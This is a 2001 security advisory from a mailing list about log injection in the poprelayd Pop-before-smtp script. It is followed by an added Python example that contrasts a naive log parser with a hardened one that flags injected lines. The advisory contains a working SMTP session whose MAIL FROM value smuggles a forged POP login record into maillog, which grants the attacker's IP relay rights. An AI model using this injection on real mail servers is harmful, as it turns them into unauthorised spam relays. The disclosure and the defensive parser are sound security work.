From: Andrea Barisani (lcars@infis.univ.trieste.it)
Date: Tue Jul 03 2001 - 12:05:10 CDT


    Hi to all,

    Poprelayd is a simple script that scans /var/log/maillog for valid POP
    logins and updates a hash db used by sendmail to permit relaying for
    those valid POP users; this method is called "Pop-before-smtp".

    The syslog string searched for by the script is of this form for the qpop
    server:

    /POP login by user \"[\-\_\w]+\" at \(.+\) ([0-9\.]+)/

    On some Cobalt RaQ3 servers (with the poprelayd add-on package installed)
    and in general on any system running the poprelayd script with sendmail, it is
    possible to "inject" this string into the syslog using sendmail logging. So
    anyone can insert a fake string with his own IP which will be parsed by
    poprelayd and that will permit the use of sendmail as a relay.

    On cobalts the presence of poprelayd is revealed by the modified sendmail
    relaying denied message "Relaying denied. Please check your mail first."

    Example:

    telnet dumbcobalt 25
    Trying 123.123.123.123...
    Connected to dumbcobalt
    ...
    ehlo dumbcobalt
    ...
    mail from:"POP login by user "admin" at (66.66.66.66) 66.66.66.66
    linux.org"
    553 "POP login by user "admin" at (66.66.66.66) 66.66.66.66
    linux.org"...Domain name required

    now the IP 66.66.66.66 can do relay :)

    in fact, on dumbcobalt:

    in /var/log/maillog

    ...reject=533 "POP login by user "admin" at (66.66.66.66) 66.66.66.66
    linux.org", size=0, class=0 ....etc etc...

    [root@dumbcobalt /]# /usr/sbin/poprelayd -p
    66.66.66.66 7

    ;-)

    Bye

    ------------------------------------------------------------
    INFIS Network Administrator & Security Officer
    Department of Physics - University of Trieste
    lcars@infis.univ.trieste.it - PGP Key 0x8E21FE82
    ------------------------------------------------------------
    "How would you know I'm mad?" said Alice.
    "You must be," said the Cat, "or you wouldn't have come here."
    ------------------------------------------------------------
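The root cause described in the post is that poprelayd runs an unanchored pattern over every line of the shared maillog, so a string that sendmail merely quotes (for example a rejected MAIL FROM argument) is indistinguishable from a real login record written by the POP daemon. The following is an added illustration, not the poprelayd script itself and not code from the post: it places the naive unanchored search beside a hardened parser that first splits each line into its syslog fields, only accepts the login record when the logging program is the POP daemon, anchors the login pattern to the start of the message, and validates the IPv4 address. Lines logged by any other program that nevertheless contain the login phrase are reported as injection attempts. The maillog lines, the program names in TRUSTED_POP_PROGS, and the sendmail log fragment are constructed for the example, modelled on the fragment shown in the post.

```python
import re

# Constructed sample maillog: one genuine POP login, one sendmail line quoting a
# rejected envelope sender that carries a forged login record, and an unrelated line.
SAMPLE_MAILLOG = [
    'Jul  3 12:01:10 dumbcobalt popper[1234]: POP login by user "alice" '
    'at (client.example.net) 192.0.2.10',
    'Jul  3 12:03:45 dumbcobalt sendmail[2345]: f63H3jX02345: from="POP login by user '
    '"admin" at (66.66.66.66) 66.66.66.66 linux.org", size=0, class=0, reject=553 '
    '"POP login by user "admin" at (66.66.66.66) 66.66.66.66 linux.org"... '
    'Domain name required',
    'Jul  3 12:04:02 dumbcobalt popper[1240]: Stats: bob 0 0 0 0 client2.example.net 192.0.2.11',
]

# The pattern from the post, searched anywhere in the line (the weak behaviour).
NAIVE_RE = re.compile(r'POP login by user "[-_\w]+" at \(.+\) ([0-9.]+)')


def naive_extract(lines):
    """Return every IP the unanchored search would accept, forged ones included."""
    hits = []
    for line in lines:
        m = NAIVE_RE.search(line)
        if m:
            hits.append(m.group(1))
    return hits


# Standard syslog layout: "Mon DD HH:MM:SS host program[pid]: message".
SYSLOG_RE = re.compile(
    r'^(?P<ts>[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d) '
    r'(?P<host>\S+) '
    r'(?P<prog>[A-Za-z0-9_.-]+)(?:\[(?P<pid>\d+)\])?: '
    r'(?P<msg>.*)$'
)

# Login record anchored to the whole message body, with a strict IPv4 capture.
POP_LOGIN_RE = re.compile(
    r'^POP login by user "(?P<user>[-_\w]+)" at \((?P<rhost>[^)]+)\) '
    r'(?P<ip>(?:\d{1,3}\.){3}\d{1,3})$'
)

# Assumed program tags the POP daemon logs under; adjust for the local server.
TRUSTED_POP_PROGS = {"popper", "qpopper", "in.qpopper"}


def _valid_ipv4(ip):
    return all(0 <= int(octet) <= 255 for octet in ip.split("."))


def parse_pop_logins(lines, trusted_progs=TRUSTED_POP_PROGS):
    """Return (accepted, suspicious).

    accepted:   list of (user, ip) taken only from lines the POP daemon wrote.
    suspicious: list of (program, line) for lines from any other program that
                contain the login phrase, i.e. likely injection attempts.
    """
    accepted, suspicious = [], []
    for line in lines:
        m = SYSLOG_RE.match(line)
        if not m:
            continue  # not a well-formed syslog line; never trust it
        prog, msg = m.group("prog"), m.group("msg")
        login = POP_LOGIN_RE.match(msg)
        if prog in trusted_progs and login and _valid_ipv4(login.group("ip")):
            accepted.append((login.group("user"), login.group("ip")))
        elif "POP login by user" in msg:
            suspicious.append((prog, line))
    return accepted, suspicious


if __name__ == "__main__":
    print("naive:", naive_extract(SAMPLE_MAILLOG))
    ok, bad = parse_pop_logins(SAMPLE_MAILLOG)
    print("accepted:", ok)
    for prog, line in bad:
        print("injection attempt via", prog, ":", line[:70], "...")
```

On the sample input the naive search accepts 66.66.66.66 because the forged record reaches the log through sendmail's own reject line, while the hardened parser accepts only alice from 192.0.2.10 and reports the sendmail line, which is also the event a log monitor should alert on. A more robust fix still is to have the POP daemon log to a file that sendmail never writes to, so the relay database is derived from a single trusted writer.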